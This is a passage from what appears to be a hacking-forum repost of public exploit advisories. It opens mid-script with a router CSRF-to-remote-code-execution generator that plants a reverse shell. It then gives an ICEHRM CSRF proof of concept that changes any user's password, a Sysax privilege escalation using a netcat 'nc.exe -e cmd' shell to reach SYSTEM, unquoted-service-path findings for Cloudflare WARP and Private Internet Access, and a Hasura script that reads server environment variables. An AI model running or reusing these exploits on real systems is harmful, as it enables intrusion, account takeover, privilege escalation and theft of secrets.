CSRF to RCE exploit") print() print() router_ip = input("## Enter the router ip to exploit: ") router_port = int( input("## Enter the victim router web page port (default is 80): ") or "80") LHOST = input("## Enter the LHOST for the router reverse shell: ") LPORT = input("## Enter the LPORT for the router reverse shell: ") load_csrf_poc_file(router_ip, router_port, LHOST, LPORT) def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port): file_path = os.path.dirname(__file__) + os.sep + "poc.template.html" if os.path.isfile(file_path): with open(file_path) as poc_file: original_poc_data_str = poc_file.read() new_html = original_poc_data_str.replace("{router_ip}", router_ip) new_html = new_html.replace( "{router_port}", str(router_port)) lhost_split_arr = lhost_ip.split(".") if len(lhost_split_arr) == 4: new_html = new_html.replace( "{lhost_ip_octect_1}", lhost_split_arr[0]) new_html = new_html.replace( "{lhost_ip_octect_2}", lhost_split_arr[1]) new_html = new_html.replace( "{lhost_ip_octect_3}", lhost_split_arr[2]) new_html = new_html.replace( "{lhost_ip_octect_4}", lhost_split_arr[3]) new_html = new_html.replace( "{lhost_port}", lhost_port) new_file_path = os.path.dirname( __file__) + os.sep + "poc.new.html" try: with open(new_file_path, 'w') as new_file: new_file.write(new_html) print() print( f'New file written to {new_file_path}. Host this file') except FileNotFoundError: print("You had an error writing to the file, doesn't exist.") else: print(f'{lhost_ip} is not a proper IPV4 address.') else: print(f'{file_path} not found') main()
  21. HireHackking

    ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover # Date: 18/03/2022 # Exploit Author: Devansh Bordia # Vendor Homepage: https://icehrm.com/ # Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS # Version: 31.0.0.OS #Tested on: Windows 10 1. About - ICEHRM IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible. 2. Description: The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover. 3. Steps To Reproduce: - Create an User name:Gaurav with permission of the Employee using the Admin User of the application and set his password. - Now login into the application using his credentials and navigate to Update Password Feature to change the password. - Intercept the request in Proxy and we can see there is a GET request used to change password and also NO CSRF Token is being used. - Finally using Burpsuite create CSRF POC and save it as exploit.html. - Now change the password in the POC to any password we want. - Finally we open this POC in the same browser session and click on the submit button. - At last when retrying to login into the application we can see that password has been reset for the account leading to account takeover. 4. Vulnerable Request: GET /app/service.php?t=Employee&a=ca&sa=changePassword&mod=modules=employees&req={"current":"Test@123 ","pwd":"Dummy@123"} HTTP/1.1 Host: localhost:8070 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost:8070/app/?g=modules&n=employees&m=module_Personal_Information Cookie: PHPSESSID=k8d27ve456j0jb56ga885j1vvb Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin 5. Exploit POC (exploit.html) <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8070/app/service.php"> <input type="hidden" name="t" value="Employee" /> <input type="hidden" name="a" value="ca" /> <input type="hidden" name="sa" value="changePassword" /> <input type="hidden" name="mod" value="modules&#61;employees" /> <input type="hidden" name="req" value="&#123;"current"&#58;"Test&#64;123"&#44;"pwd"&#58;"Dummy&#64;123"&#125;" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  22. HireHackking

    Sysax FTP Automation 6.9.0 - Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Author: bzyo (@bzyo_) # Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation # Date: 03-20-2022 # Vulnerable Software: Sysax FTP Automation 6.9.0 # Vendor Homepage: https://www.sysax.com/ # Version: 6.9.0 # Software Link: https://www.sysax.com/download/sysaxauto_setup.msi # Tested on: Windows 10 x64 # Details: Sysax Scheduler Service runs as Local System. By default the application allows for low privilege users to create/run backup jobs other than themselves. By removing the option to run as current user or another, the task will run as System. A low privilege user could abuse this and escalate their privileges to local system. # Prerequisites: To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low privileged user account # Exploit: Logged in as low privileged account 1. Create folder c:\temp 2. Download netcat (nc.exe) to c:\temp 3. Create file 'pwn.bat' in c:\temp with contents c:\temp\nc.exe localhost 1337 -e cmd 4. Open command prompt and netcat listener nc -nlvvp 1337 5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation 6. Select Setup Scheduled/Triggered Tasks - Add task (Triggered) - Update folder to monitor to be c:\temp - Check 'Run task if a file is added to the monitor folder or subfolder(s)' - Choose 'Run any other Program' and choose c:\temp\pwn.bat - Uncheck 'Login as the following user to run task' - Finish and Save 7. Create new text file in c:\temp 8. Check netcat listener C:\WINDOWS\system32>whoami whoami nt authority\system
  23. HireHackking

    Cloudflare WARP 1.4 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path # Date: 05/03/2022 # Exploit Author: Hejap Zairy # Vendor Homepage: https://www.cloudflare.com/ # Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/ # Version: 1.4.107 # Tested: Windows 10 Pro x64 es C:\Users\Hejap>sc qc CloudflareWARP [SC] QueryServiceConfig SUCCESS SERVICE_NAME: CloudflareWARP TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Cloudflare WARP DEPENDENCIES : wlansvc SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  24. HireHackking

    Private Internet Access 3.3 - 'pia-service' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path # Date: 04/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.privateinternetaccess.com # Software Link: https://www.privateinternetaccess.com/download # Version: 3.3.0.100 # Tested: Windows 10 x64 # Contact: https://twitter.com/dmaral3noz # Step to discover Unquoted Service Path: C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname DisplayName Name PathName StartMode StartName Private Internet Access Service PrivateInternetAccessService "C:\Program Files\Private Internet Access\pia-service.exe" Auto LocalSystem # Service info: C:\Users\saudh>sc qc PrivateInternetAccessService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: PrivateInternetAccessService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\Private Internet Access\pia-service.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Private Internet Access Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  25. HireHackking

    Hasura GraphQL 2.2.0 - Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure # Software: Hasura GraphQL Community # Software Link: https://github.com/hasura/graphql-engine # Version: 2.2.0 # Exploit Author: Dolev Farhi # Date: 5/05/2022 # Tested on: Ubuntu import requests SERVER_ADDR = 'x.x.x.x' url = 'http://{}/v1/metadata'.format(SERVER_ADDR) print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read') while True: env_var = input('Type environment variable key to leak.\n> ') if not env_var: continue payload = { "type": "bulk", "source": "", "args": [ { "type": "add_remote_schema", "args": { "name": "ttt", "definition": { "timeout_seconds": 60, "forward_client_headers": False, "headers": [], "url_from_env": env_var }, "comment": "" } } ], "resource_version": 2 } r = requests.post(url, json=payload) try: print(r.json()['error'].split('not a valid URI:')[1]) except IndexError: print('Could not parse out VAR, dumping error as is') print(r.json().get('error', 'N/A'))